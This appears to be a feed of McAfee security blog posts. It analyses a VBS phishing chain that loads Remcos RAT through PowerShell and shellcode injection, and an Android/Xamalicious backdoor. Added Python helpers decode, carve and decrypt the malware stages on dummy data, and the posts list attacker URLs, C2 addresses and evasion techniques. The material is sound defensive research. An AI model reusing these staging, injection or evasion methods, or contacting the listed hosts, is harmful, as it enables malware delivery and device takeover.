GenAI is clearly having a moment with demonstrated potential. At the same time, being able to recognize the technical and financial downsides of GenAI is as important for the healthy development of the industry. In the same way we don’t use the hammer for every task at home, we should continuously ask: Is this problem worth GenAI? And is the value provided by this technology (when applied to my domain-specific use case) going to exceed the operational shortcomings? It is with this mindset that the industry will make significant and responsible progress in solving problems with a diverse but efficient set of tools. Let’s continue exploring and building the fascinating world of GenAI, without forgetting what our ultimate goals are.
The post Generative AI: Cross the Stream Where it is Shallowest appeared first on McAfee Blog.
Authored by Preksha Saxena and Yashvi Shah
McAfee Labs has been tracking a sophisticated VBS campaign characterized by obfuscated Visual Basic Scripting (VBS). Initially delivering the AgentTesla malware, the campaign has evolved into a multi-faceted threat, employing VBS scripts as a versatile delivery mechanism. Notably, this campaign extends beyond AgentTesla, now distributing a range of malware such as Guloader, Remcos RAT, Xworm, and Lokibot.
This campaign illustrates a comprehensive infection process initiated by a VBS file delivered via email. Starting with the activation of a VBS script, it progresses through PowerShell phases, utilizing the BitsTransfer utility for fetching a second-stage PowerShell script. The decoded and executed Shellcode A conceals and loads Shellcode B. In the final phase, wab.exe downloads the encrypted Remcos RAT payload. Shellcode B decrypts and injects it into wab.exe, making it function as the Remcos RAT.
The campaign has targeted diverse regions worldwide. The geographical heatmap below shows McAfee customers who were targeted, and protected, over the past three months.
Figure 1: Geo Heatmap showing targeted regions.
In the campaign analyzed in this post, the actors used GuLoader to deploy the Remcos RAT.
Figure 2: Infection chain
Execution begins with the VBS script, which triggers the first-stage PowerShell. The BitsTransfer utility is then used to fetch a second-stage PowerShell script, which is base64 encoded.
The second-stage PowerShell is decoded and executed. It carves out the first shellcode and loads it reflectively; the second shellcode, encoded within shellcode A, is decoded and also loaded reflectively.
The final step involves a second Shellcode which is leveraged to retrieve and inject the Remcos RAT (Remote Control and Surveillance Tool) into a legitimate Windows process. In this case, wab.exe. This intricate series of actions allows for the stealthy deployment and operation of the Remcos RAT within the Windows environment.
Figure 3: Process Tree
Attached to the email is a ZIP file seemingly labeled as “revised_quotation_for_purchase_invoice_order_design_6th_november_2023“, resembling an invoice to the user. The intent, much like similar deceptive emails, is for the recipient not to scrutinize the email closely.
Inside the zip file attachment is a heavily obfuscated VBS file. The VBS script employed several techniques to make the analysis quite difficult. It has many garbage variables, decoy functions, and unnecessary comments, and all the malicious functions are obfuscated.
Figure 4: Heavily obfuscated script
Removing the redundant lines and comments leaves a much more concise script:
Figure 5: Post-removing the junk code
In the script, there’s a frequent appending of new strings to the variable “Fu6”. This method serves to increase the complexity of the analysis. Once all the strings are concatenated and formatted, the result emerges in a more intriguing manner. As shown in the below image.
Figure 6: After deobfuscating the code
The function “Mikr9” converts the concatenated strings into readable form. Applying it to every string in “Fu6” yields the real script. For example, as shown in Figure 6, the string
‘DelfhAdvetFagstStatpYapp:Nona/fisk/Indh1 Sic0 Tra3parc. Mon1Gens7Vide6Eufo.Tast1Outs1Midd1afte.Dors1husg6 Hal3Beja/ Hypm RenuColonSprgdNasahToasuRafflchon.GyttpBrnefMuckbAcci ’ becomes http://103.176.111[.]163/mundhul.pfb.
Likewise, the entire script is decoded, and we get the following script:
Figure 7: After applying decrypting function Mikr9()
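The example string above gives away how Mikr9 works: reading only the fifth character of every five-character group (“Delfh” → h, “Advet” → t, “Fagst” → t, “Statp” → p, and so on) reproduces http://103.176.111.163/mundhul.pfb exactly, with the other four characters being junk. The following is an added decoder, not code from the original post and not Mikr9 itself (whose body the page does not show): it implements that stride-5 extraction, adds a brute-force helper for the common case where the stride is unknown and the decoder function is itself obfuscated, and defangs the result the way the write-up prints it. The stride-5 interpretation is inferred from the page’s one example.

```python
# The obfuscated string quoted above (without the page's surrounding quotes)
# and its decoded form. The page prints the IP defanged as 103.176.111[.]163.
OBFUSCATED = "DelfhAdvetFagstStatpYapp:Nona/fisk/Indh1 Sic0 Tra3parc. Mon1Gens7Vide6Eufo.Tast1Outs1Midd1afte.Dors1husg6 Hal3Beja/ Hypm RenuColonSprgdNasahToasuRafflchon.GyttpBrnefMuckbAcci "
EXPECTED = "http://103.176.111.163/mundhul.pfb"


def decode_every_nth(s, n=5):
    """Keep the n-th character of every n-character group and drop the junk
    letters in between. With n=5 this reproduces Mikr9's output above."""
    return s[n - 1::n]


def find_stride(s, max_n=12, markers=("http://", "https://", ":\\", "\\\\")):
    """Brute-force the stride: return every n in 2..max_n whose output contains
    a URL or Windows path marker. Handy when the decoder function is obfuscated."""
    return [n for n in range(2, max_n + 1)
            if any(m in decode_every_nth(s, n) for m in markers)]


def decode_script_strings(lines, n=5):
    """Apply the decoder to each concatenated string of a cleaned-up script."""
    return [decode_every_nth(line, n).strip() for line in lines]


def defang(url):
    """Bracket the last dot of the host, the way the write-up prints IOCs."""
    scheme, sep, rest = url.partition("://")
    if not sep:
        return url
    host, slash, path = rest.partition("/")
    head, dot, tail = host.rpartition(".")
    if not dot:
        return url
    return f"{scheme}://{head}[.]{tail}{slash}{path}"


if __name__ == "__main__":
    print(find_stride(OBFUSCATED))
    print(defang(decode_every_nth(OBFUSCATED).strip()))
```

Running find_stride first and only then fixing n avoids guessing: a stride that produces a URL out of junk by accident is vanishingly unlikely, so the single hit it returns is the decoder.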
The script conducts the following sequence of activities:
The file retrieved shows zero detection on VT, appears to be base64 encoded, and has a size of 336KB.
Figure 8: Second Powershell script
Figure 9: Content is base64 encoded
Upon decoding “mundhul.pfb,” a detailed analysis can be conducted to comprehend its functionality, enabling further examination of the malware’s execution. Once the file gets decoded, it reveals a code resembling the image provided below.
Figure 10: Base64 decoded data
As the script specifies, it seeks to offset 229981 in the decoded data and reads the next 28050 bytes. This is the start of the second PowerShell script, which is 28050 bytes long, marked as follows.
Figure 11: Start of encrypted second PowerShell
The code contains various comments, so we followed the same procedure, as we did for the first script, removed all the junk code and we got a function that seems to handle the decryption of all the strings.
Figure 12: After removing the junk
The decryption process iterates multiple times to unveil the strings, and the malware employs the “Invoke” method to execute its commands. After decoding all the strings using “Bedroges02” function, we finally got the intent of the script.
Figure 13: After applying decryption logic
The PowerShell script first resolves VirtualAlloc() and allocates two memory regions, storing their addresses in the variables “trll3” and “Akuammin195”; both regions are allocated with read, write and execute permissions. The latter part of the script invokes shellcode concealed in the downloaded data.
The copy sequence is as follows: the first 644 bytes of the decoded data are shellcode A, and the next 229337 bytes, starting at byte 644, are shellcode B. Together these account for exactly 229981 bytes, the offset at which the second PowerShell script itself begins (Figure 11), so the shellcode is the data that precedes the script in the decoded mundhul.pfb.
Figure 14: Constituting shellcode
Following the execution sequence, the malware calls the CallWindowProcA API, which in turn leads to the native function NtProtectVirtualMemory, and from there control passes directly to the first shellcode.
The shellcode-A’s primary action involves copying the shellcode B into memory, as depicted in the figure below.
Figure 15: Loop used for copying shellcode B
The shellcode B undergoes decryption via XOR operation. This operation serves to transform the code into its executable form, allowing the decrypted shellcode to execute its intended instructions within the system’s memory.
Figure 16: Decryption loop used for decrypting shellcode B
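The three numbers quoted on this page (644, 229337 and 229981) fix the layout of the decoded mundhul.pfb, and the XOR loop in Figure 16 fixes how shellcode B is recovered. The following is an added example, not code from the original post: a carving helper that decodes the base64 download, slices the PowerShell script from offset 229981, slices shellcode A and B from the head, and XOR-decrypts B with a repeating key. The stand-in file it builds has the real layout but dummy contents, and the one-byte key is an assumption; the page shows the loop, not the key.

```python
import base64

# Sizes quoted in the write-up for the decoded mundhul.pfb. Shellcode A (644 bytes)
# plus shellcode B (229,337 bytes) is 229,981 bytes: exactly the offset at which
# the 28,050-byte second PowerShell script starts, so the script sits right
# after the shellcode it later copies into memory.
SC_A_LEN = 644
SC_B_LEN = 229337
PS_OFFSET = SC_A_LEN + SC_B_LEN   # 229981
PS_LEN = 28050


def carve(blob, offset, length):
    """Return blob[offset:offset+length], refusing to silently truncate."""
    if offset < 0 or offset + length > len(blob):
        raise ValueError(f"cannot carve {length} bytes at {offset} from {len(blob)}")
    return blob[offset:offset + length]


def xor_decrypt(data, key):
    """Repeating-key XOR; with a one-byte key this is the loop of Figure 16."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def unpack_stage(b64_text, key):
    """Decode the base64 download and return (ps_script, shellcode_a, shellcode_b),
    with shellcode B already XOR-decrypted."""
    decoded = base64.b64decode(b64_text)
    script = carve(decoded, PS_OFFSET, PS_LEN)
    sc_a = carve(decoded, 0, SC_A_LEN)
    sc_b = xor_decrypt(carve(decoded, SC_A_LEN, SC_B_LEN), key)
    return script, sc_a, sc_b


# Constructed stand-in for mundhul.pfb: the real layout with dummy contents.
# The XOR key is an assumption; the page shows the loop, not the key.
DEMO_KEY = bytes([0x5A])


def build_demo_stage():
    sc_a = b"A" * SC_A_LEN
    sc_b_plain = b"B" * (SC_B_LEN - 5) + b"<end>"
    script = b"# second-stage PowerShell placeholder\n".ljust(PS_LEN, b" ")
    decoded = sc_a + xor_decrypt(sc_b_plain, DEMO_KEY) + script
    return base64.b64encode(decoded).decode()


if __name__ == "__main__":
    script, sc_a, sc_b = unpack_stage(build_demo_stage(), DEMO_KEY)
    print(len(script), len(sc_a), len(sc_b), sc_b[-5:])
```

On the real download the same slicing applies once the key is read out of the decryption loop; if the carved PowerShell does not start with readable script text, the offset or the base64 decoding is wrong, which is why carve() raises rather than returning a short slice.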
The shellcode creates a new process named “wab.exe” and copies 0x3FC4000 bytes of decrypted shellcode into its memory space. As indicated by the highlighted blue box, the content decrypted from the second shellcode (shown in Figure 15) is then injected into the wab.exe process (depicted in Figure 16).
Figure 17: Injection of second shellcode
The objective of the shellcode is to fetch the Remcos RAT from the URL “hxxp://103.176.111[.]163/lnHxQotdQb132.bin” and inject it into the “wab.exe” process. Once the final payload has been injected, wab.exe carries out all of the malicious activity.
Figure 18: wab.exe connecting to C2
The file retrieved from that URL is an encrypted binary. Once decrypted, it communicates with the IP address 94.156.65[.]197 over port 2404. It creates a mutex named “Rmc-R7V4VM”, stores keylogged data in a file called “logs.dat”, saves captured screenshots in a directory named “Screenshots”, and keeps all collected data under a folder titled “Remcos”.
Conclusion:
This campaign shows the complete infection chain started by a VBS file delivered through email. The VBS script kicks off the first PowerShell stage, which uses the BitsTransfer utility to fetch a base64-encoded second-stage PowerShell script. After decoding and execution, the first shellcode is extracted and loaded reflectively; Shellcode A then copies and decodes Shellcode B and loads it.
In the final phase, the injected wab.exe downloads the encrypted Remcos RAT payload. Shellcode B decrypts the payload and injects it into wab.exe, so that this instance of wab.exe runs as the Remcos RAT.
VBScript in the Windows Environment: A Security Perspective
VBScript, introduced by Microsoft in 1996, was a core scripting language in the Windows environment for task automation, tightly integrated with Internet Explorer and a key component of technologies such as Windows Script Host, Active Server Pages and Office automation. It provided a simple scripting solution for system tasks, web development and server-side logic. Microsoft has announced that VBScript is deprecated: it will first become a feature on demand and will eventually be removed from Windows. The decision is part of a broader strategy to cut off Windows and Office features that malware campaigns abuse. VBScript has been disabled by default in Internet Explorer 11 since 2019, yet it is still used by malicious actors to distribute malware, and Microsoft aims to close this infection vector.

Attackers keep exploiting phased-out technologies because they linger in legacy systems, updates are adopted slowly, custom applications depend on them, industry requirements constrain change and users resist it. Prompt updates, security education and awareness of software lifecycles are the practical countermeasures.
Mitigation:
Avoiding email phishing requires a vigilant and cautious approach. Here are some common practices that help prevent falling prey to it:
Indicators of Compromise:
Indicator | Value |
VBS file | 6fdd246520eebb59e37a7cd544477567b405a11e118b7754ff0d4a89c01251e4 |
Second PowerShell | 5d21216a92ffea5b8ba70f48f9bcbb8a530a9b272423ae3ba519dbf74a905a65 |
Final payload | 7d947df412e78a595029121ecaf9d8a88e69175cffd1f2d75d31e3ca8995c978 |
URL1 | hxxp://103.176.111[.]163/mundhul.pfb |
URL2 | hxxp://103.176.111[.]163/lnHxQotdQb132.bin |
IP address | 103.176.111[.]163 |
IP address | 94.156.65[.]197 |
Mutex | Rmc-R7V4VM |
The post From Email to RAT: Deciphering a VB Script-Driven Campaign appeared first on McAfee Blog.
Authored by Fernando Ruiz
McAfee Mobile Research Team identified an Android backdoor implemented with Xamarin, an open-source framework for building Android and iOS apps with .NET and C#. Dubbed Android/Xamalicious, it uses social engineering to obtain accessibility privileges, then contacts its command-and-control server to decide whether to download a second-stage payload that is injected at runtime as an assembly DLL. That payload gives it full control of the device and the ability to perform financially motivated actions such as clicking on ads and installing apps without user consent.
Because the powerful accessibility services were already granted during the first stage, the second-stage payload can take full control of the infected device; the first stage also contains functions to self-update the main APK, so the malware could behave as spyware or a banking trojan without any user interaction. We identified a link between Xamalicious and the ad-fraud app “Cash Magnet”, which automatically clicks ads, installs apps and performs other actions to generate fraudulent revenue, while users who installed it may earn points that are supposedly redeemable as retail gift cards. The developers behind these threats are therefore financially motivated and engaged in ad fraud, which is likely one of Xamalicious's main payloads.
Using the Xamarin framework allowed the malware authors to remain active and undetected for a long time, taking advantage of the APK build process, which worked as a packer hiding the malicious code. The authors also implemented several obfuscation techniques and custom encryption to exfiltrate data and communicate with the command-and-control server.
We’ve identified about 25 different malicious apps that carry this threat. Some variants have been distributed on Google Play since mid-2020. The apps identified in this report were proactively removed by Google from Google Play ahead of our reporting. McAfee is a member of the App Defense Alliance and an active partner in the malware mitigation program, which aims to quickly find Potentially Harmful Applications (PHAs) and stop them before they ever make it onto Google Play. Android users are protected by Google Play Protect, which can warn users of identified malicious apps on Android devices. McAfee Mobile Security detects this threat as Android/Xamalicious.
Based on install counts, these apps may have compromised at least 327,000 devices through Google Play, in addition to installations from third-party markets, which continue to produce new infections according to detection telemetry from McAfee clients around the world. This threat remains very active.
Figure 1. “Count Easy Calorie Calculator” was available on Google Play in August 2022 and carries Android/Xamalicious
Android/Xamalicious trojans are apps related to health, games, horoscope, and productivity. Most of these apps are still available for download in third-party marketplaces.
We have previously seen malware abusing the Xamarin framework, such as the open-sourced AndroSpy and its forks, but Xamalicious is implemented differently. The Xamarin architecture is well documented, including how .NET code is run on Android through Mono.
Let’s use the app “Numerology: Personal horoscope & Number predictions” as an example. Once started it immediately requests the victim to enable accessibility services for “correct work” and provides directions to activate this permission:
Figure 2. Tricking users into granting accessibility services permission
Users need to manually activate the accessibility services after several OS warnings such as the following on the accessibility options:
Figure 3. Accessibility services configuration prompt highlights the risks of this permission.
This is neither traditional Java code nor a native ELF Android application: the malicious module was originally written in .NET and compiled into a dynamic link library (DLL). The DLL is then LZ4-compressed and either embedded in a BLOB file or stored directly in the /assemblies directory of the APK. At runtime it is loaded by a native library (ELF) or by the DEX code. In practice this means that in some samples reversing the DLL assemblies is straightforward, while in others extra steps are needed to unpack them.
The malicious code is usually available in two different assembly files in the /assemblies directory on the apk. Usually, file names are core.dll and a <package-specific>.dll.
Some malware variants obfuscate the DLL assemblies to hinder analysis and reversing of the malicious code, while others leave the original code readable.
Figure 4. Core.dll and GoogleService.dll contain malicious code.
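The "extra steps to unpack" mentioned above usually amount to stripping Xamarin's assembly compression. The following Python is an added example (not McAfee's tooling) that walks the assemblies/ directory of an APK and inflates each DLL: a compressed Xamarin assembly starts with the 4-byte magic "XALZ", a uint32 descriptor index and a uint32 uncompressed length (all little-endian), followed by a raw LZ4 block. The LZ4 block decoder is implemented inline so the script needs only the standard library; the APK and the LZ4 block it contains are constructed in the script, not taken from a sample.

```python
import io
import struct
import zipfile

XALZ_MAGIC = b"XALZ"
XALZ_HEADER = struct.Struct("<4sII")   # magic, descriptor index, uncompressed length


def lz4_block_decompress(src: bytes, expected_len: int) -> bytes:
    """Minimal LZ4 *block* decoder (no frame header). Each sequence is a token
    whose high nibble is the literal length and low nibble the match length
    (both extended by 0xFF runs when 15), the literals, a 2-byte little-endian
    match offset, and an implicit minimum match length of 4. The last sequence
    carries literals only."""
    out = bytearray()
    pos, n = 0, len(src)
    try:
        while pos < n:
            token = src[pos]
            pos += 1
            lit_len = token >> 4
            if lit_len == 15:
                while True:
                    extra = src[pos]
                    pos += 1
                    lit_len += extra
                    if extra != 255:
                        break
            out += src[pos:pos + lit_len]
            pos += lit_len
            if pos >= n:                      # final literal-only sequence
                break
            offset = src[pos] | (src[pos + 1] << 8)
            pos += 2
            if offset == 0 or offset > len(out):
                raise ValueError("corrupt LZ4 block: match offset outside output")
            match_len = (token & 0x0F) + 4
            if token & 0x0F == 15:
                while True:
                    extra = src[pos]
                    pos += 1
                    match_len += extra
                    if extra != 255:
                        break
            start = len(out) - offset
            for i in range(match_len):        # byte-wise so overlapping (RLE-style) matches work
                out.append(out[start + i])
            if len(out) > expected_len:
                raise ValueError("corrupt LZ4 block: output exceeds declared length")
    except IndexError:
        raise ValueError("truncated LZ4 block") from None
    if len(out) != expected_len:
        raise ValueError(f"decompressed {len(out)} bytes but header declares {expected_len}")
    return bytes(out)


def unpack_assembly(data: bytes) -> tuple:
    """Return (assembly_bytes, was_compressed): a plain PE/DLL ("MZ") passes
    through unchanged, an XALZ container is inflated and length-checked."""
    if not data.startswith(XALZ_MAGIC):
        return data, False
    if len(data) < XALZ_HEADER.size:
        raise ValueError("truncated XALZ header")
    _magic, _descriptor_index, size = XALZ_HEADER.unpack_from(data, 0)
    return lz4_block_decompress(data[XALZ_HEADER.size:], size), True


def extract_assemblies(apk: bytes) -> dict:
    """Map every assemblies/*.dll entry of an APK (given as bytes) to
    (unpacked_bytes, was_compressed)."""
    result = {}
    with zipfile.ZipFile(io.BytesIO(apk)) as z:
        for name in z.namelist():
            if name.startswith("assemblies/") and name.lower().endswith(".dll"):
                result[name] = unpack_assembly(z.read(name))
    return result


# --- constructed sample data -------------------------------------------------
# Hand-assembled LZ4 block: literals "ABCD", an 8-byte match at offset 4
# (yielding "ABCDABCDABCD"), then a final literal run "hello".
SAMPLE_BLOCK = b"\x44ABCD\x04\x00\x50hello"
SAMPLE_PLAIN = b"ABCDABCDABCDhello"


def xalz_wrap(block: bytes, uncompressed_len: int, descriptor_index: int = 0) -> bytes:
    """Build an XALZ container around an LZ4 block (used only to fabricate the sample)."""
    return XALZ_HEADER.pack(XALZ_MAGIC, descriptor_index, uncompressed_len) + block


def build_sample_apk() -> bytes:
    """A minimal fake APK with one compressed and one plain assembly."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("assemblies/core.dll", xalz_wrap(SAMPLE_BLOCK, len(SAMPLE_PLAIN), 3))
        z.writestr("assemblies/GoogleService.dll", b"MZ\x90\x00fake-dll")
        z.writestr("classes.dex", b"dex\n035\x00")
    return buf.getvalue()


SAMPLE_APK = build_sample_apk()

if __name__ == "__main__":
    for name, (blob, compressed) in extract_assemblies(SAMPLE_APK).items():
        print(name, "XALZ" if compressed else "plain", blob[:4])
```

Samples that embed the assemblies in a BLOB file rather than as individual entries need the blob split first; once each assembly's bytes are isolated, unpack_assembly applies unchanged.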
Once accessibility permissions are granted the malware initiates communication with the malicious server to dynamically load a second-stage payload.
Figure 5. App execution and communication with the malicious server
Android/Xamalicious collects device data, including the list of installed applications obtained via system commands, to determine whether the infected victim is a worthwhile target for the second-stage payload. It can also collect location, carrier and network information, the device's rooting status and its ADB configuration; if the device is connected via ADB or is rooted, the C2 will not provide the second-stage DLL for download.
Method/Command | Description |
DevInfo | Hardware and device information that includes: |
GeoInfo | Location of the device based on its IP address; the malware contacts services such as api.myip.com to obtain the device location and ISP data. FraudScore: a self-protection check to identify whether the device belongs to a real user. |
EmuInfo | Lists all adb properties (around 640 on a real device), URL-encoded as a string parameter. This data may be used to determine whether the affected client is a real device or an emulator, since it contains parameters such as: |
RootInfo | After trying to determine whether the device is rooted using multiple techniques, the result is consolidated in this command |
Packages | Uses the system commands “pm list packages -s” and “pm list packages -3” to list system and third-party apps installed on the device. |
Accessibility | Reports whether accessibility services permission has been granted |
GetURL | Sends only the Android ID and is the request for the second-stage payload. The C2 evaluates the client request and returns a status and an encrypted assembly DLL. |
To evade analysis and detection, the malware authors encrypted all communication and data exchanged between the C2 and the infected device: on top of HTTPS, every message is wrapped as a JSON Web Encryption (JWE) token using RSA-OAEP for key management and A128CBC-HS256 for content encryption. However, the RSA key values used by Xamalicious are hardcoded in the decompiled malicious DLL, so the transmitted information can be decrypted if the C2 infrastructure is available during analysis.
In the Send() function, Android/Xamalicious first prepares the object to be sent, usually a JSON structure, by calling encrypt(), which builds the JWE token with the hardcoded RSA key. The data is then exfiltrated fully encrypted to the malware host at the path “/Updater” via an HTTP POST.
It then waits for the C2 response and passes it to decrypt(), which holds a hardcoded RSA private key, to recover the received command; for the “getURL” command the response may contain the second-stage payload.
Encrypt Method:
Figure 6. Encrypt function with hardcoded RSA Key values as XML string
Because the decryption method and the RSA key values (stored as an XML string) are hardcoded in the malware, the research team could build a key object from those parameters, decrypt the contents of the JWE tokens and intercept the communication with the C2.
Collected data is sent to the C2, which decides whether the device is a suitable target for the second-stage payload. The authors' self-protection goes beyond traditional emulator detection and country-code restrictions: the C2 will not deliver the second stage if the device is rooted, connected over ADB via USB, has no SIM card, or fails any of several other environment validations.
With the getURL command the infected client requests the malicious payload. If the C2 server decides the device is “Ok” to receive the library, it encrypts a DLL with AES in CBC mode using a per-client key derived from the device ID and other parameters described below. Since AES is a symmetric cipher, the same key encrypts and decrypts the payload.
The encrypted DLL is embedded in the HTTP response inside the encrypted JWE token. The client receives the token, decrypts it, and then decrypts the ‘url’ parameter with AES-CBC and the custom key.
The AES key used to decrypt the assembly is unique per infected device: a 32-character string formed from the device ID, brand and model, right-padded with the character “1” to 32 characters.
For instance, if the device ID is 0123456ABCDEF010 and the affected device is a Pixel 5, then the AES key is: “0123456ABCDEF010googlePixel 5111”
The DLL is therefore protected by multiple layers of encryption.
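Both layers just described hinge on key material the analyst can reconstruct: the hardcoded RSA parameters in the .NET RSAKeyValue XML form (Figure 6) and the per-device AES key built from DevInfo fields. The following Python is an added example (stdlib only, not McAfee's tooling) that parses such an XML key, checks the private parameters for consistency, writes it out as a PKCS#1 PEM that openssl or any JWE library accepts, and derives the cache.bin key from the device identity. The XML key in the script is a toy key constructed for the demo, not the malware's; how the malware handles a device identity longer than 32 characters is not described in the write-up, so the derivation refuses such inputs (an assumption).

```python
import base64
import math
import xml.etree.ElementTree as ET

RSA_FIELDS = ("Modulus", "Exponent", "D", "P", "Q", "DP", "DQ", "InverseQ")

# Constructed toy key (p=61, q=53, e=17) in .NET RSAKeyValue layout; each value
# is base64 of the big-endian unsigned integer, as RSA.ToXmlString() emits.
TOY_KEY_XML = """<RSAKeyValue>
  <Modulus>DKE=</Modulus><Exponent>EQ==</Exponent><D>CsE=</D>
  <P>PQ==</P><Q>NQ==</Q><DP>NQ==</DP><DQ>MQ==</DQ><InverseQ>Jg==</InverseQ>
</RSAKeyValue>"""


def parse_rsakeyvalue(xml_text: str) -> dict:
    """Parse an RSAKeyValue document into ints and verify the private parameters
    (p*q == n and e*d == 1 mod lcm(p-1, q-1)); a public-only key is rejected
    because it cannot decrypt the JWE traffic."""
    root = ET.fromstring(xml_text)
    if root.tag != "RSAKeyValue":
        raise ValueError("not an RSAKeyValue document")
    key = {}
    for name in RSA_FIELDS:
        node = root.find(name)
        if node is None or not (node.text or "").strip():
            raise ValueError(f"missing parameter {name}")
        key[name] = int.from_bytes(base64.b64decode(node.text.strip()), "big")
    n, e, d, p, q = (key[k] for k in ("Modulus", "Exponent", "D", "P", "Q"))
    lam = (p - 1) * (q - 1) // math.gcd(p - 1, q - 1)
    if p * q != n or (e * d) % lam != 1:
        raise ValueError("inconsistent RSA parameters")
    return key


def der_len(n: int) -> bytes:
    """DER length octets (short form below 128, long form otherwise)."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def der_int(v: int) -> bytes:
    """DER INTEGER for a non-negative int, with the leading 0x00 pad when needed."""
    body = v.to_bytes((v.bit_length() + 7) // 8 or 1, "big")
    if body[0] & 0x80:
        body = b"\x00" + body
    return b"\x02" + der_len(len(body)) + body


def rsa_private_key_pem(key: dict) -> str:
    """PKCS#1 RSAPrivateKey ::= SEQUENCE { version, n, e, d, p, q, dp, dq, qinv }."""
    body = b"".join(der_int(v) for v in [0] + [key[k] for k in RSA_FIELDS])
    der = b"\x30" + der_len(len(body)) + body
    b64 = base64.b64encode(der).decode()
    lines = [b64[i:i + 64] for i in range(0, len(b64), 64)]
    return "-----BEGIN RSA PRIVATE KEY-----\n" + "\n".join(lines) + "\n-----END RSA PRIVATE KEY-----\n"


def derive_payload_key(device_id: str, brand: str, model: str) -> bytes:
    """Per-device AES key for cache.bin: deviceId + brand + model, right-padded
    with "1" to 32 characters. Longer identities are refused (assumption)."""
    raw = f"{device_id}{brand}{model}"
    if len(raw) > 32:
        raise ValueError("device identity exceeds the 32-character key; behaviour undocumented")
    return raw.ljust(32, "1").encode("utf-8")


if __name__ == "__main__":
    key = parse_rsakeyvalue(TOY_KEY_XML)
    print(rsa_private_key_pem(key))
    print(derive_payload_key("0123456ABCDEF010", "google", "Pixel 5"))
```

With the PEM in hand, the captured "/Updater" POST bodies and responses can be fed to a JWE implementation as RSA-OAEP / A128CBC-HS256 tokens; the decrypted getURL response then yields the AES-CBC ciphertext that derive_payload_key unlocks.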
All of this serves to hide the payload and stay under the radar, with some success: some variants may have been active for years without AV detection.
Xamalicious stores this DLL on the local file system as “cache.bin” and finally loads it dynamically with the Assembly.Load method.
Once the second-stage payload is loaded the device can be fully compromised: with accessibility permissions granted, the malware can observe and interact with any activity, opening a backdoor to any kind of malicious behaviour.
During our analysis, the downloaded second-stage DLL contained a class named “MegaSDKXE” that was obfuscated and incomplete, probably because the C2 did not receive the parameters it expected and withheld the complete malicious stage, which may be limited to a specific carrier, language, installed app, location, time zone or other conditions of the affected device. Even so, this is a high-risk backdoor that allows arbitrary commands to be executed on the affected device, not limited to spying, impersonation or financially motivated fraud.
One of the Xamalicious samples detected by McAfee Mobile generic signatures was “LetterLink” (com.regaliusgames.llinkgame), available on Google Play at the end of 2020 with a book icon. Its store listing was poorly described; it is in fact a hidden version of “Cash Magnet”, an app that performs ad fraud through automated clicks, app downloads and other tasks that generate affiliate-marketing revenue. The app offers users points that are supposedly redeemable for retail gift cards or cryptocurrency.
Figure 8a. LetterLink login page after running the app for the first time.
Figure 8b. LetterLink agreement for Cash Magnet
Originally published on Google Play in 2019, “Cash Magnet” (com.uicashmagnet) was described as a passive-income application that let users earn up to $30 USD per month by running automated ads. After Google removed it, the authors smuggled the same scheme back in as LetterLink and, more recently, “Dots: One Line Connector” (com.orlovst.dots), both hidden versions of the same ad-fraud operation.
Figure 9. LetterLink Icon that hides Cash Magnet
“LetterLink” performs the same Xamalicious activities: it contains the “core.dll” library, connects to the same C2 server and uses the same hardcoded RSA private key to build the JWE tokens, which is strong evidence that the developers of Cash Magnet are behind Xamalicious.
Figure 10. Cash Magnet infiltrated the app as a Game, available until the end of 2023
The “Dots: One Line Connector” app is not a game: the screenshot published on Google Play does not match the application's behaviour, because once started it simply asks for authentication credentials without any logo or reference to Cash Magnet. “Dots” does not contain the same DLLs as its predecessor, but its communication with the C2 is similar and uses the same RSA key parameters. We reported this app to Google and it was promptly removed from Google Play.
Based on our telemetry, most affected users are in the Americas, with the most activity in the USA, Brazil and Argentina. Infections were also reported in Europe, especially in the UK, Spain and Germany.
Figure 11. McAfee detections Android/Xamalicious around the world
Android applications written in non-Java code with frameworks such as Flutter, React Native and Xamarin give malware authors an additional layer of obfuscation; they deliberately pick these tools to avoid detection, stay under the radar of security vendors and keep their presence on app markets.
Avoid apps that require accessibility services unless there is a genuine need. If a new app tries to convince you to enable accessibility services, claiming they are required without a real and reasonable justification, and asks you to ignore the operating system's warning, that is a red flag.
Because accessibility permissions are granted, the second-stage payload can take control of the device: any other permission or action can then be obtained or performed by the malware if the injected code instructs it to.
Since it is difficult for users to deal with all these threats on their own, we strongly recommend installing security software and keeping it up to date. McAfee Mobile Security products help users safeguard their devices and mitigate the risks of this kind of malware.
Android/Xamalicious Samples Distributed on Google Play:
Package Name | App Name | Installs |
com.anomenforyou.essentialhoroscope | Essential Horoscope for Android | 100,000 |
com.littleray.skineditorforpeminecraft | 3D Skin Editor for PE Minecraft | 100,000 |
com.vyblystudio.dotslinkpuzzles | Logo Maker Pro | 100,000 |
com.autoclickrepeater.free | Auto Click Repeater | 10,000 |
com.lakhinstudio.counteasycaloriecalculator | Count Easy Calorie Calculator | 10,000 |
com.muranogames.easyworkoutsathome | Sound Volume Extender | 5,000 |
com.regaliusgames.llinkgame | LetterLink | 1,000 |
com.Ushak.NPHOROSCOPENUMBER | NUMEROLOGY: PERSONAL HOROSCOPE &NUMBER PREDICTIONS | 1,000 |
com.browgames.stepkeepereasymeter | Step Keeper: Easy Pedometer | 500 |
com.shvetsStudio.trackYourSleep | Track Your Sleep | 500 |
com.devapps.soundvolumebooster | Sound Volume Booster | 100 |
com.Osinko.HoroscopeTaro | Astrological Navigator: Daily Horoscope & Tarot | 100 |
com.Potap64.universalcalculator | Universal Calculator | 100 |
The post Stealth Backdoor “Android/Xamalicious” Actively Infecting Devices appeared first on McAfee Blog.
Authored by Neil Tyagi and Fernando Ruiz
In a digitally evolving world, the convenience of banking through mobile applications has revolutionized financial transactions. However, this advancement has also opened doors to a lesser-known adversary: Android phishing. Join us as we delve into the clandestine realm of cyber threats targeting India’s banking sector.
This blog examines an Android phishing/banking trojan identified as Android/Banker.AFX, which illustrates a common procedure cybercriminals use to drain their victims' bank accounts:
First, phishing messages are broadcast via WhatsApp, luring users into installing an app that carries malicious code disguised as a verification tool. Once installed, the banking trojan collects personal and financial information and intercepts SMS messages in order to steal the one-time passwords or verification codes required to complete transactions, which can lead to the theft of the victim's bank account funds.
This trojan is one variant among many banking trojan implementations recently observed in the wild that carry similar risks. It is not technically sophisticated, but it can be very effective and prevalent, especially when widely distributed on social media. McAfee Mobile Security protects broadly and generically against this type of banking trojan.
